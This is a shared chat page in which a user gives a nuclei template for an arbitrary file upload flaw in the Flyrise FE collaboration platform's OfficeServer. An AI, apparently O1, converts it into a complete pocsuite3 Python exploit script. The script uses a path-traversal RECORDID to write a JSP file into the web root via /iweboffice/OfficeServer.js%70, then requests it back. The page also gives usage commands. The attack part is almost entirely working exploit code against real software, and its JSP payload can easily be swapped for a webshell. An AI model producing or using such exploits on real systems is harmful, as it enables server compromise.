logoChat01.ai

飞企互联文件上传漏洞

Created on: January 13, 2025

Answered using O1 by Chat01

Question

id: Flyrise-FEM-OfficeServer-upload
info:
name: 飞企互联-FE业务协作平台 OfficeServer 任意文件上传
author: SleepingBag945
severity: critical

variables:
str1: '{{rand_base(8)}}'

http:

  • raw:

    • |
      POST /iweboffice/OfficeServer.js%70 HTTP/1.1
      Host: {{Hostname}}
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0.60dabdd3d70bcd96
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
      Accept-Language: zh-CN,zh;q=0.9
      Connection: close

      DBSTEP V3.0 93 0 28 DBSTEP=REJTVEVQ
      OPTION=U0FWRUZJTEU=
      RECORDID=Li4vLi4vLi4vamJvc3Mvd2ViL2ZlLndhci91aWQuanNw
      <%out.println("{{str1}}");%>

    • |
      GET /uid.jsp;.js HTTP/1.1
      Host: {{Hostname}}
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0.60dabdd3d70bcd96
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7
      Accept-Encoding: gzip, deflate
      Accept-Language: zh-CN,zh;q=0.9
      Connection: close

    extractors:

    • type: dsl
      name: only_for_sleep
      dsl:
      • wait_for(3)

    matchers:

    • type: dsl
      dsl:
      • status_code_2 == 200 && contains(body_2,'{{str1}}')
        写一个pocsuite3的poc
        主要%70,必须保留,

Thought

Setting up the foundation

I’m setting up a POC with pocsuite3 for Flyrise-FEM-OfficeServer-upload using HTTP requests, aiming to highlight a vulnerability in a Python script.

Crafting the POC details

I’m setting up the POC for Flyrise-FEM-OfficeServer-upload, specifying endpoint details, vulnerability type, and including necessary imports and metadata for pocsuite3.

Outlining the process

I’m detailing the steps to generate a pocsuite3 POC, including requests and response handling to verify the presence of a random string in the second response.

Executing the request

I’m detailing a POST request to the specified endpoint with headers and data, ensuring the random string is included for future verification.

Thought about POC design in pocsuite3,持续 14 秒

Answer

下面给出一个示例的 pocsuite3 POC,实现了对 飞企互联-FE业务协作平台 OfficeServer 任意文件上传 漏洞的检测。注意其中 OfficeServer.js%70 的 “%70” 一定要保持原样。

说明

  1. 该 POC 仅用于安全研究或在获得授权的情况下使用,切勿用于非法用途。
  2. 脚本中有部分字段(如作者、日期等)可根据实际情况进行调整。
  3. 如果环境网络状况不佳,发送完第一个请求后可能需要 sleep 更久。
python
#!/usr/bin/env python3
# coding=utf-8

"""
pocsuite3 POC for 飞企互联-FE业务协作平台 OfficeServer 任意文件上传漏洞
"""

import time
from pocsuite3.api import POCBase, Output, register_poc, logger, requests
from pocsuite3.api import POC_CATEGORY
from pocsuite3.lib.utils import random_str


class FlyriseFEMOfficeServerFileUploadPOC(POCBase):
    # 漏洞的基本信息
    vulID = "Flyrise-FEM-OfficeServer-upload"       # 漏洞编号,可自定义
    version = "1.0"
    author = "SleepingBag945"
    vulDate = "2025-01-13"
    createDate = "2025-01-13"
    updateDate = "2025-01-13"
    references = []
    name = "飞企互联-FE业务协作平台 OfficeServer 任意文件上传"
    appPowerLink = ""
    appName = "飞企互联-FE业务协作平台 OfficeServer"
    appVersion = "all"
    vulType = "Arbitrary File Upload"
    category = POC_CATEGORY.EXPLOITS.WEBAPP

    desc = """
        飞企互联-FE业务协作平台 OfficeServer 模块存在任意文件上传漏洞,攻击者可通过特殊构造请求上传恶意文件并导致服务器被入侵。
    """
    pocDesc = """
        1. 发送 POST 请求至 /iweboffice/OfficeServer.js%70,构造特定数据包含恶意代码
        2. 等待几秒后,再访问 /uid.jsp;.js 验证是否执行成功
    """

    def _verify(self):
        result = {}
        base_url = self.url.strip().rstrip("/")
        
        # 为了验证上传的有效性,构造一个随机字符串写入 jsp 文件中
        str1 = random_str(8)

        # Step 1: 构造 POST 请求,目标路径含 %70
        post_path = "/iweboffice/OfficeServer.js%70"
        # 这里模拟了官方 poc 中的数据结构,可根据实际情况增删改
        # 注意:<%out.println("...");%> 中不能少,否则无法写入
        data = (
            "DBSTEP V3.0     93                     0        28              DBSTEP=REJTVEVQ\n"
            "OPTION=U0FWRUZJTEU=\n"
            "RECORDID=Li4vLi4vLi4vamJvc3Mvd2ViL2ZlLndhci91aWQuanNw\n"
            f"<%out.println(\"{str1}\");%>"
        )

        headers = {
            "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
            "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9," 
                      "image/avif,image/webp,image/apng,*/*;q=0.8",
            "Connection": "close"
        }

        try:
            # 发送文件上传请求
            upload_url = base_url + post_path
            requests.post(upload_url, data=data, headers=headers, timeout=5, verify=False)
            
            # 可根据网络情况调整等待时间
            time.sleep(3)

            # Step 2: 验证文件是否成功写入
            get_path = "/uid.jsp;.js"
            verify_url = base_url + get_path
            r2 = requests.get(verify_url, headers=headers, timeout=5, verify=False)
            
            if r2.status_code == 200 and str1 in r2.text:
                # 表示上传成功,可读取到随机串
                result["VerifyInfo"] = {}
                result["VerifyInfo"]["URL"] = verify_url
                result["VerifyInfo"]["Data"] = str1

        except Exception as e:
            logger.error(f"Request Error: {e}")

        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail("Target is not vulnerable")
        return output


# 注册 POC
register_poc(FlyriseFEMOfficeServerFileUploadPOC)

使用方法

  1. 安装并配置好 pocsuite3 环境。
  2. 将上述脚本保存为 flyrise_fem_officeserver_upload.py(名字可自定),然后执行: 
    bash
    pocsuite -r flyrise_fem_officeserver_upload.py -u http://target.com --verify
  3. 如果目标存在漏洞并成功写入测试字符串,将会在 VerifyInfo 中输出相应结果。若没有输出,则目标不存在此漏洞或检测失败。

Share this Q&A